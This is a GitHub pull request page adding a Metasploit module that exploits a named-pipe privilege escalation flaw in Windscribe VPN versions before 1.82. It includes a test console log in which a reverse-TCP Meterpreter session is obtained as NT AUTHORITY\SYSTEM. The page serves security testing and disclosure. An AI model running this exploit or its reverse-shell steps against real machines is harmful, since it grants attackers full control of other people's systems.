Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Windscribe WindscribeService Named Pipe Privilege Escalation #12894

Merged

Conversation

@bcoles
Copy link
Contributor

bcoles commented Feb 1, 2020

Add Windscribe WindscribeService Named Pipe Privilege Escalation

The Windscribe VPN client application for Windows makes use of a
Windows service WindscribeService.exe which exposes a named pipe
\\.\pipe\WindscribeService allowing execution of programs with
elevated privileges.

Windscribe versions prior to 1.82 do not validate user-supplied
program names, allowing execution of arbitrary commands as SYSTEM.

@bcoles bcoles added module docs labels Feb 1, 2020
@bwatters-r7 bwatters-r7 self-assigned this Feb 5, 2020
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Feb 5, 2020

msf5 exploit(multi/handler) > use exploit/windows/local/windscribe_windscribeservice_priv_esc 
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > show options

Module options (exploit/windows/local/windscribe_windscribeservice_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1
session => 1
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true
verbose => true
msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] Writing payload (283 bytes) to C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe ...
[*] Sending C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe to \\.\pipe\WindscribeService ...
[+] Opended \\.\pipe\WindscribeService! Proceeding ...
[*] Sending stage (180291 bytes) to 192.168.132.125
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49682) at 2020-02-05 12:30:36 -0600
[-] Failed to delete C:\Users\msfuser\AppData\Local\Temp\w40AUSFh.exe: stdapi_fs_delete_file: Operation failed: Access is denied.

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

bwatters-r7 added a commit that referenced this pull request Feb 5, 2020
…calation

Merge branch 'land-12894' into upstream-master
@bwatters-r7 bwatters-r7 merged commit 34621c0 into rapid7:master Feb 5, 2020
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@bcoles bcoles deleted the bcoles:windscribe_windscribeservice_priv_esc branch Feb 5, 2020
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Feb 5, 2020

Release Notes

This PR adds a local privilege escalation module for exploiting a vulnerability in the Windscribe service installed by Windscribe VPN versions < 1.82 that allows a user to run an arbitrary executable as SYSTEM.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

2 participants
You can’t perform that action at this time.